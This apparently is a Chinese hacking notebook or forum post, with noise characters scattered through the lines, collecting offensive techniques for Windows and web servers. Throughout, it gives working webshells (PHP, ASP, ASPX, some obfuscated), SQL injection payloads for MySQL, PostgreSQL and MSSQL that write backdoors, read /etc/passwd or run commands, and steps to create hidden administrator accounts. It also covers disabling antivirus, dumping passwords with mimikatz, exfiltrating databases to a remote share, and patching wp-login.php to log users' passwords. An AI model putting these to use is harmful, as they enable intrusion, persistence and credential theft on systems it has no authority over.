0 l/ ]7 n8 g- \* B1 p( D中文版本操作系统中针对mysql添加用户完整代码:, I# k( `" o% W: U5 J$ W) p
7 |3 Y' b4 Y3 c' f3 f& S2 Ruse test;7 b/ p8 r u! P; ^* v$ e
create table a (cmd text);& i! r$ {3 v9 I8 Q
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
# a8 j6 _9 m& }1 L( Sinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );: Q; q7 n* d/ h- f. R! Z
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
7 m6 M$ i% R* L2 z! T, sselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
$ X7 S& R+ S- u2 d; R7 ^$ _drop table a;" o1 ^1 W7 ~3 p9 O9 L
- n* V+ X. c: u( O+ Y1 t2 j8 N英文版本:
3 z* Y) B' L& F: y* ^- H) ]' z$ d/ s! p
use test;
7 h7 }/ j' \9 `# v6 }3 A8 ]create table a (cmd text);
) v4 a6 O' E; d7 |7 j3 Q/ yinsert into a values ("set wshshell=createobject (""wscript.shell"") " );
8 P5 G5 g/ f$ g9 ^5 g6 @: Yinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
- F' S8 M5 i7 Pinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
1 M/ l" Q- f0 x, Mselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs"; P4 f; n" p# m1 c
drop table a;9 ]' w- Y: y/ V; i
% z; H; C' w4 B4 H2 W, h5 m
create table a (cmd BLOB);
& [4 `" l1 s1 W0 sinsert into a values (CONVERT(木马的16进制代码,CHAR));+ y! E( B6 `# P3 R
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'0 v: D" o! \. G& q* C$ L# e/ w
drop table a;
! z% v' ^! d$ r% k. {
. F2 {- A! W8 M" d' v+ g3 ~记录一下怎么处理变态诺顿! ?. X5 [% q# T+ m4 ~0 |2 Z' p
查看诺顿服务的路径/ r: c/ h0 D, D& C. V$ O
sc qc ccSetMgr# ?4 u- T; a2 q
然后设置权限拒绝访问。做绝一点。。
, d* G9 \ m/ a% C4 D/ A: Vcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
+ m- b1 @! E( ?4 ^cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
5 H" ?( U# |. ~, ~cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators9 M0 i- e8 h: I* g7 L" @
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
0 n) \& y1 ~7 U5 Q; Y7 w; w0 W: F+ ?: Y4 _+ h0 v3 W
然后再重启服务器5 M: R% {( p4 n& a1 q; f
iisreset /reboot
3 }4 y5 P! l" c* n7 H8 M% w* A这样就搞定了。。不过完事后。记得恢复权限。。。。
1 ^; M1 |3 _1 N! B& @/ G: Ocacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
3 ]! W1 g/ }/ ?$ n( j$ Acacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
N G$ {* o- pcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F% R8 N) o* d& T4 \7 F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F4 D7 ?8 }" Y" d
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
$ R8 y" E5 o+ t; Y: o- Y- p- f6 [) y4 |
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')1 k: U. q# J0 @7 Y% |, c' w: Y
' ~, }$ a C) P. Q
postgresql注射的一些东西
0 m% {2 u; C5 g b% p/ C) Q如何获得webshell
# B3 W6 N, B4 I, p! W* Khttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
' M, {7 ~2 r7 Ahttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
( Z" E2 @/ r3 G7 x% s( k2 j! khttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;, Y' m+ I/ s0 V. M
如何读文件6 _' y" @% c( E$ a
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);7 R) t2 F& y) @+ O7 M& Y q- i$ @. X
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;) r% y+ N2 D; n
http://127.0.0.1/postgresql.php?id=1;select * from myfile;7 Y2 Y2 Q6 x4 X
1 ?2 B* c; u7 u4 a$ [
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
2 {2 Q% h; F1 s2 W当然,这些的postgresql的数据库版本必须大于8.X
$ P1 \2 X1 o/ b创建一个system的函数:: }3 v+ }: `& n* `7 O: J
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
1 ]4 _, A, f, N" q: u9 [* l3 W' o ~& q) z% j$ M; h0 j- @0 [6 x
创建一个输出表:5 B0 W, K$ F8 ^$ X7 a
CREATE TABLE stdout(id serial, system_out text)
7 c* _* Z! _, c6 `
; x m: M. p" Q7 d8 i执行shell,输出到输出表内:
6 I; K; `( o- u1 X8 u- mSELECT system('uname -a > /tmp/test')
& p+ Z3 f8 A p1 g3 F$ b, g. V; c) V& n, P( s
copy 输出的内容到表里面;
3 {" X: o; p/ a+ G$ A! r0 Y+ ]COPY stdout(system_out) FROM '/tmp/test'
& \$ a. ^6 P9 ]- N" g0 G" h, i ]0 F
从输出表内读取执行后的回显,判断是否执行成功% Z1 l7 M+ O8 K- h" N+ D6 b
" e5 i- L0 G( r7 I4 N1 T3 d0 v! @
SELECT system_out FROM stdout
7 ^$ \( S9 b W, b, v下面是测试例子
7 } {5 I' {, g5 H( l" v- n+ x7 r
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
$ d7 G8 G, w+ t( D, Q4 g, t5 S8 j5 L! v2 j
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'' r" k4 A/ t V. n+ s
STRICT --
- Q7 y: F. a t4 [, K, H9 L) x0 L; p
/store.php?id=1; SELECT system('uname -a > /tmp/test') --
. E3 p0 I8 z' d$ i6 H' Q# U/ b
# _' d; k9 j" h2 s7 L& j/ n/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
, u7 d4 C0 a* S6 X4 e
4 g. e+ s7 k$ e9 M7 T/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--! ]7 T& a) o6 L6 ^: F' q4 ]8 _
net stop sharedaccess stop the default firewall) M7 ~0 e" K3 C: O, [
netsh firewall show show/config default firewall* f9 b0 m/ Q$ Y% \# ^& Y# Z: {
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
; \ X+ Z$ e6 p3 Gnetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall
8 R' A t& L2 a修改3389端口方法(修改后不易被扫出)
2 E& Q+ }8 t3 y d2 Q* c修改服务器端的端口设置,注册表有2个地方需要修改0 e& J8 P5 B* \8 d' n5 C* P9 w
5 u Q# W# F: W7 w[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
. @1 Y" v3 @2 j0 F; X2 E/ ePortNumber值,默认是3389,修改成所希望的端口,比如6000
1 T2 d( o( y8 e# O6 z) @
+ d& @" {7 ?8 g6 l$ C4 y第二个地方:% B2 l- x( J+ b: R
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
" j( f: P. S/ C7 O" W! n8 }PortNumber值,默认是3389,修改成所希望的端口,比如60006 j2 R: w) h! N$ n! g
5 z$ ~6 d$ z" @5 r" v
现在这样就可以了。重启系统就可以了
, n4 g. x3 N: m& p- S* C
7 o% V: o4 _. f# o2 z! e$ X8 B查看3389远程登录的脚本, J* u* |/ r2 W% i
保存为一个bat文件
7 @7 o! a: A9 `5 f# l: Zdate /t >>D:\sec\TSlog\ts.log
5 |4 g6 m6 L: n: p! I! Y. Utime /t >>D:\sec\TSlog\ts.log
- A M3 m1 y! z0 s2 dnetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
$ W* C, H* c6 Z) S5 s8 ?/ P/ }start Explorer6 N* @5 P5 w8 {4 m0 G8 J, O
+ q4 Q1 w& R3 L" v* U2 V/ gmstsc的参数:
2 F+ {6 U$ U6 h. |# y
# A7 G0 |" \0 }: p( c5 O% d远程桌面连接
7 `% H5 m# k# H6 r& K; L7 _% E
' O \( R& |+ y9 ]* JMSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
# q; @& ]& Z1 f0 y! `4 F [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
' ^! I; I4 n V' N' b1 Q6 E0 [% q7 C/ M8 c1 C9 D: O, S
<Connection File> -- 指定连接的 .rdp 文件的名称。
! D+ C/ U" X1 p. D N: L& F/ V+ X! g" G3 |
/v:<server[:port]> -- 指定要连接到的终端服务器。$ W+ u, K- u" L* z" f1 l
- G! l/ d. J7 f/console -- 连接到服务器的控制台会话。5 r) I3 F: Y5 E; c
_, o# r6 M- ^( x' p) _1 S9 W/f -- 以全屏模式启动客户端。6 c1 `* j5 P; f& z
2 Q, S4 _3 X6 B e* z. r
/w:<width> -- 指定远程桌面屏幕的宽度。* Z1 E( E( K- e2 |5 |
8 p5 J$ d1 k1 ]# z# S" s. X/h:<height> -- 指定远程桌面屏幕的高度。
6 e5 z8 D" i/ m8 M7 a
) @0 \2 \8 F6 S0 _- q8 E& Y8 G/edit -- 打开指定的 .rdp 文件来编辑。
9 \9 I" ^. |1 {3 F4 Z( U0 E; F8 \% @' a5 J. y8 M" _* Q
/migrate -- 将客户端连接管理器创建的旧版
1 d t6 a4 {* x. |& `3 C( d/ l连接文件迁移到新的 .rdp 连接文件。 j( s+ A& s0 W
C7 y7 i& v- F; z8 ^+ D3 S
6 K7 k" ?* |- \) I! ]* E+ N其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
$ q8 z0 ~: q4 `$ N/ F$ A; t% jmstsc /console /v:124.42.126.xxx 突破终端访问限制数量( m! {6 R5 I) T9 K3 A
/ D1 i- x8 G% K* G; N: S2 r
命令行下开启33891 V8 e& y7 f# W/ ]% T8 W2 X
net user asp.net aspnet /add# y5 b. ]. K( f1 K( }# G
net localgroup Administrators asp.net /add
, S# L$ R" J' b; {$ T; Snet localgroup "Remote Desktop Users" asp.net /add2 @; c+ ?& x d
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D" q. y8 }4 M N+ K. c+ O1 u) F
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
; s4 }/ t; S$ Y" necho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
" u, g! y, b& {3 Fecho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f( b. { p0 o7 d; Q. m9 u4 e ^0 w
sc config rasman start= auto1 {! w( I. {/ n3 P' {
sc config remoteaccess start= auto2 [9 i4 b) S. x5 `, r. s
net start rasman
- P$ _ I' x; ~/ u d' vnet start remoteaccess8 k& a8 W. p" u2 P
Media- C9 Z+ e7 Z& A6 D: X/ `* W
<form id="frmUpload" enctype="multipart/form-data"% ~6 u+ v4 M$ r0 z7 G+ j
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>8 `) n& i/ E) \" R( U
<input type="file" name="NewFile" size="50"><br>% ^" Q8 n/ H+ `
<input id="btnUpload" type="submit" value="Upload">
5 N0 n8 p2 \0 U</form>
0 w5 ] n# C5 a
! b3 h9 t4 j$ \9 ~( {control userpasswords2 查看用户的密码' x% j' M6 S& C; z! b0 q, H# _
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
( N! t, l, y1 b5 W9 l& a4 eSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a* E; l, n; K1 ?+ p
6 ]7 ^$ {- t9 P3 y' d2 ?. W1 r- t! T
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:$ l; W+ I8 l& E$ l- Z8 r% S
测试1:
' t/ b; C+ s& D& D& iSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1" ^* W3 G5 n3 G' S) M J
# B/ | B) }1 y, w/ U; ^测试2:) ^/ ]5 X6 J/ b7 P3 t+ j
- Y" d- V& ~3 n
create table dirs(paths varchar(100),paths1 varchar(100), id int)% ~' z Z# @! n! n5 e1 c
6 o: r) o @5 h( F1 Gdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--6 f, A6 E% ~/ D7 k- H3 L D
: \: e- r5 @( T( n: m- I: ?
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1* J% A5 L4 H' A7 B% n
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令# G& S% ]; Y( Y$ S6 ~
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
; k; y( D2 R; @9 dnet stop mcafeeframework; |/ C6 ?6 g6 E9 B' ]
net stop mcshield( w/ s1 \8 C2 K) l: b" y: U3 N
net stop mcafeeengineservice$ r: w. o4 l) }+ Q. u: q% K
net stop mctaskmanager
9 x" j9 e7 @% P1 g% i: f7 Fhttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D' K8 {$ G `9 \. L$ s/ A
5 q2 f. G: c2 h2 q2 U
VNCDump.zip (4.76 KB, 下载次数: 1)
2 u" C1 Q2 C& u: @$ n6 ?4 O8 q密码在线破解http://tools88.com/safe/vnc.php3 A8 p: F0 n5 r1 c
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
+ g2 r# ^4 g) G. S- }2 t' p1 f J' W! H6 O4 ^% L: A) @. Y
exec master..xp_cmdshell 'net user'
) a! t9 z7 F) w% C* C0 }" I3 u4 pmssql执行命令。1 \3 Z+ Y4 L7 P: g3 D4 ^- Q
获取mssql的密码hash查询! B* w$ x0 l [! k
select name,password from master.dbo.sysxlogins
4 t9 G1 n4 T. G! r( v2 @+ u
8 s: _' g. |2 D8 @' M+ Vbackup log dbName with NO_LOG;+ s: i% r% x; M* o. F3 G2 V
backup log dbName with TRUNCATE_ONLY;
, y3 ]' w. e1 q0 D; ~! h& S. EDBCC SHRINKDATABASE(dbName);
7 N7 Z6 f- \! z- B3 q8 ~mssql数据库压缩" g$ c+ I* ?! Z, V/ ~& {
5 c- H: S* b$ N( j/ iRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK" M! D6 j, U: ]" z. v, F+ ?2 v
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
/ s" v& S5 W3 e# O; ?$ ]4 v6 [, i( ?( M
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
4 _3 w' f. v. `* g' C o备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
% T: |6 G; b8 v! [- T8 s' ^+ N8 k3 H: G6 A1 K1 M6 \$ X
Discuz!nt35渗透要点:3 t( G$ Z8 k; a" x* g p* `
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
4 Z6 `2 b+ z3 B8 o(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
, j. V4 w8 X0 M- Z(3)保存。
% |2 |! n: }! A b0 r' p(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass- Y) g& ^5 J6 Z+ ~! Z
d:\rar.exe a -r d:\1.rar d:\website\
1 ^& ~+ Q( I6 V+ m递归压缩website$ ?& i; g( [# H8 a9 Q3 j( O' w
注意rar.exe的路径% I; o6 J5 T4 J" {$ S+ f
( `8 U9 K2 p8 v
<?php
9 X5 Z0 `' T# n; s5 s1 ?$ t' Y/ {& v8 `' \8 i* Y
$telok = "0${@eval($_POST[xxoo])}";
( S5 j3 V1 T' p8 L0 R3 z# S0 Q: q6 k8 }
$username = "123456";% M7 M$ `+ v" A3 f1 Q' y* E; B. e
$ K2 R' Z- K; e$ V# K$userpwd = "123456";7 ]0 x7 t7 l$ c5 V8 T& c5 G
8 W% n, P- c: _& K$telhao = "123456";
- @" H8 @* \' r+ X3 q! Q, `) c
6 i5 X! o% v1 Q$telinfo = "123456";
. c" U! k6 s* o* ?0 E1 F
/ B) s" L4 c" T" K7 k) ^?>
) N. I% Y& F% v% a6 vphp一句话未过滤插入一句话木马
1 L3 I2 ~% m. q) }( z, ^
3 H8 {& I7 q+ @# b% b) f, `站库分离脱裤技巧5 X. [0 V2 T$ c* [2 _6 L+ h; b" ]% ]
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'6 L$ _0 u& Q# g0 A% |
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
, I9 Y+ D, f9 X3 M. y- J条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
, k8 A% j/ g6 V+ V这儿利用的是马儿的专家模式(自己写代码)。( J( L6 d( E4 U+ y+ [2 M
ini_set('display_errors', 1);7 X: \+ [9 {8 V. {- x
set_time_limit(0); U$ X$ P" m0 c6 X/ X, |, C
error_reporting(E_ALL);; i( s% i& w; ?: L% o2 T7 @
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());2 o$ G& z) ]5 s1 x' p
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
' ~& @; e! h# W/ g+ F5 z( u$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
1 \* L* Y, i. j$i = 0;
; L* Q4 a+ \+ b& p( i$tmp = '';4 }1 |- x% l9 k5 I) J
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {+ }( _ I: V* b2 U) v
$i = $i+1;
6 A3 e" f6 y/ U $tmp .= implode("::", $row)."\n";
0 { Q3 V7 Q/ @% ^ if(!($i%500)){//500条写入一个文件- ^2 c, K+ O; f! d ~) o
$filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
& D3 L p5 j- u$ c file_put_contents($filename,$tmp);! B! {6 K. W. Q: I1 e9 _+ A
$tmp = '';; Z+ g. @ a$ ^1 e& n
}# r( R. |" S/ E# `/ d; C2 e
}! a6 |( W: U$ @% C# i
mysql_free_result($result);
$ D$ I: V5 Z0 i) Y3 L- u4 X C& l" Y# p" ?9 i5 Y8 U
9 V. p! j4 l3 a! J9 R, L. R- Q& S: d: n5 a+ {& ]
//down完后delete& q) B( x- `! ^6 a/ y* h6 T& \
^3 S/ t0 m2 @- M7 K4 s
7 u m# [4 ?$ w* p
ini_set('display_errors', 1);
% _( a- N: }( W6 q# V( m5 l5 }error_reporting(E_ALL);0 ~3 U, b0 u/ O9 S7 N- G' }
$i = 0;% R* p6 Q& b$ ]8 T' C6 L
while($i<32) {% }8 g; a Q! U6 o/ ]+ i1 ]
$i = $i+1;. ^$ b6 I* ]; C
$filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';- p' K8 Q5 t7 N
unlink($filename);
+ G; o6 g- _% A# X7 F% d} 4 k7 `! d4 n% `. t5 u
httprint 收集操作系统指纹+ e( q+ c [7 O2 Z( C/ H
扫描192.168.1.100的所有端口
, x/ V' J/ K( D6 t) Rnmap –PN –sT –sV –p0-65535 192.168.1.1003 P- O2 _' ?$ A8 F
host -t ns www.owasp.org 识别的名称服务器,获取dns信息
. Z' R" X3 E9 { a+ D7 x# e' [host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
/ @) @8 ]8 c8 B% D- ^Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host) a# k* D7 [/ c1 c' L) ` B1 c
# Z1 y+ K+ c- {2 ]Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)9 X7 M* q0 F7 D* [9 G+ H) b
6 g5 K1 | C1 D! _& Q MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
( ]6 X$ \$ `) _4 x) R0 Q, D. B, @
9 j! b4 N6 J4 U' ?: t5 @( S Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x4 d H: V. g8 K) Q4 }
) i) O+ o8 z) w' J
DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
# i J8 B* F( F/ P* ]0 d8 R% n. A7 j5 |8 ~, L2 D
http://net-square.com/msnpawn/index.shtml (要求安装)% a" J0 Y5 V) Y/ B6 U' l
/ ?& f# w) o5 q! A5 \
tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)+ i4 }, q2 L% B- H- [) D0 O0 E
1 ?2 r9 J$ a2 U SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)" Y5 Q i2 `' g1 Y; h: s @1 |; S7 q
set names gb2312
$ G- v9 ~3 @) }2 I导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
7 e* Z5 J& v" M" v4 e+ x
) n8 R' [4 P, l/ @! U; emysql 密码修改" G) S% X9 _! ?0 |$ t2 X
UPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ”
# A4 f3 C1 r" ?update user set password=PASSWORD('antian365.com') where user='root';' Z6 ^0 t5 \# S2 J# ]- b& ~
flush privileges;7 f9 j0 I2 m( l4 I B
高级的PHP一句话木马后门" j3 r; _$ {* a7 g# ?* E
9 ]; r" s" N9 g0 u" y$ h- }
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀# Q/ w( m6 S' b6 l9 }
( {0 @1 A) j3 S" w5 c1、
3 W7 b4 L; n9 v$ k* {8 }) U8 l0 F) d+ L) ]# Q% P' K7 q4 u/ j( T
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
8 D, I& ?' d2 ]
9 F6 t& @& ~+ u' m$hh("/[discuz]/e",$_POST['h'],"Access");% N; Z+ t4 n) N9 ?
5 K i- A! ?( o3 @$ G. M//菜刀一句话
! C- Y8 r2 ^1 u/ `+ R
( M2 v: a2 p* x" t2、: l! I/ p& I9 z2 p0 W
, K" h% Z. j7 ~$filename=$_GET['xbid'];) u: \3 ^6 Z2 Q& J% m0 U
$ F& t7 d+ @5 v* Yinclude ($filename);7 l% Z; P3 u' s5 l( {' q1 C
1 p2 {- L% [* a
//危险的include函数,直接编译任何文件为php格式运行
' X" P- ]: E! G: _9 l- H2 U4 F. ~0 K1 u8 J2 r
3、; T+ \3 e& t Q* \
: k/ d0 P! t6 \* m( H8 j4 R' a$reg="c"."o"."p"."y";; ?* ~8 w1 t' B% z. Q, F9 n
( j; j% r9 l) c* U& }6 l$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);2 y4 y' t4 s$ R
! e5 k1 x# E8 @% n Y5 c* h9 V! ]//重命名任何文件( h( a# P+ }* L }; ~' ?7 L
3 [5 X x4 o/ \* g: A/ x. z
4、' n# ?5 B: d; }3 e/ B/ s9 x) h
9 _% f6 z+ c+ J& g9 g8 X" c$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
) s2 K( V# ^& l/ X; c `! r; q5 v
: ~; K% J3 ?2 I- L6 K U$gzid("/[discuz]/e",$_POST['h'],"Access");, ^; Y- l2 v* H" m: `* u
( Z+ _! P K. W9 R6 x% {
//菜刀一句话
2 l$ n# V2 c% c3 M6 P8 U t2 f. r
5、include ($uid);) v1 P0 C$ K7 u) U# N
8 j0 z4 q4 f% V5 l( c3 z
//危险的include函数,直接编译任何文件为php格式运行,POST
+ a9 r% u s; `+ s; v' f2 w; Q+ [+ D1 E. C1 W7 [+ u
6 j& o. L6 j% o8 [7 ~$ _
//gif插一句话
1 m p, @# _& A& A, |6 i
% v3 l7 _ _" a8 f1 a, W6、典型一句话9 q2 U: l1 s& c
: d" P1 k7 D! \1 B8 V! Y4 |程序后门代码
& G w) L, W2 @3 j<?php eval_r($_POST[sb])?>9 Q) _: H+ G& b1 R. G; a
程序代码
' b. D% y0 Q% S7 _, @6 Y<?php @eval_r($_POST[sb])?>
! A6 y |0 k5 Z$ ] B4 w$ p7 ?" A//容错代码0 `/ _- j+ N3 a% M" e
程序代码
# K% v3 ^8 y- ^<?php assert($_POST[sb]);?>1 `+ I& S% X0 T
//使用lanker一句话客户端的专家模式执行相关的php语句
- u. e K% [7 @4 k* i# S程序代码+ E! f: L9 F6 W3 d! |: c
<?$_POST['sa']($_POST['sb']);?>5 A! D- E+ N$ w
程序代码
' a( O; C, J( V5 _) S9 l<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>* Y- x* H! d6 T" r5 B, F: U# A \
程序代码
8 z' U4 [! C# [' _' p, ~<?php
2 y* n) f7 j# k: A# i@preg_replace("/[email]/e",$_POST['h'],"error");
- I8 g3 P+ q/ y, X6 l. H?>+ I" U+ T9 N" Y" R5 P; E
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入' D# @; C+ O# |- F/ L: ^, [
程序代码
% R0 ?( L7 A7 V F9 H<O>h=@eval_r($_POST[c]);</O>
4 q8 ~1 k8 X4 d5 q2 Z程序代码
2 U6 u8 m. C, |) f; J1 a( g D8 h<script language="php">@eval_r($_POST[sb])</script>2 r3 h+ @9 v4 ]. I! F4 F3 W
//绕过<?限制的一句话
, i; q, h# [0 f2 g1 u
4 T0 o) }: e' R3 X- _- H/ Jhttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
/ o. S) |) j# M: `7 m; h详细用法:3 ] c: t! v: M% B g; p0 `( H8 a
1、到tools目录。psexec \\127.0.0.1 cmd
& j! Y( W/ ]( [2、执行mimikatz
* e% a# `/ F+ J: f# M; V3、执行 privilege::debug
( T' Y0 D( @) W& P1 y& K4、执行 inject::process lsass.exe sekurlsa.dll
/ E9 `2 o: C( z/ _5、执行@getLogonPasswords
. j% l2 x1 A( B0 Z3 a+ |6、widget就是密码" x) |( p+ t/ O7 ~$ f
7、exit退出,不要直接关闭否则系统会崩溃。
9 g6 _& ]& v, F# h" g) [( ]6 H$ c8 U, V- r" Z; S8 k: t5 q9 F
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面" a" b+ r6 m' ~' B4 I
. o1 @7 v4 R6 @4 w# ?) [( Z
自动查找系统高危补丁
0 L6 @$ s5 d% E8 J) r3 H1 Msysteminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt5 N+ K: z6 ~8 z7 F# @. H' l
' P9 s% \( F9 B( B7 z/ [ l
突破安全狗的一句话aspx后门
# f. @, a" L# n; X<%@ Page Language="C#" ValidateRequest="false" %>
) w4 S/ `( j9 I3 n<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>( N u" `1 d4 |, @' q
webshell下记录WordPress登陆密码. H$ [; k2 k* g/ O
webshell下记录Wordpress登陆密码方便进一步社工
7 L& k1 F) f% p2 r在文件wp-login.php中539行处添加:7 P( y4 b' r! m/ l
// log password# @ I" K4 A( W0 T* J8 S
$log_user=$_POST['log'];
& m9 Y& U% p' `$ i$log_pwd=$_POST['pwd'];
1 L9 O1 c2 y+ P% x0 L$log_ip=$_SERVER["REMOTE_ADDR"];
& w! g5 e- y4 J* R! X$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
# ^' s2 y( b3 Q6 L8 u, u$txt=$txt.”\r\n”;6 N5 a' @4 M" \% x. m0 ]2 h8 u
if($log_user&&$log_pwd&&$log_ip){( W2 L2 a- t8 f3 |1 t
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
, ]6 w l& ]7 V! t0 Z}( q9 f' _$ m' o+ k( C" `& E1 P7 T* r
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。! \* `$ d) G$ M! y; R
就是搜索case ‘login’, |! F5 `8 o8 E
在它下面直接插入即可,记录的密码生成在pwd.txt中,
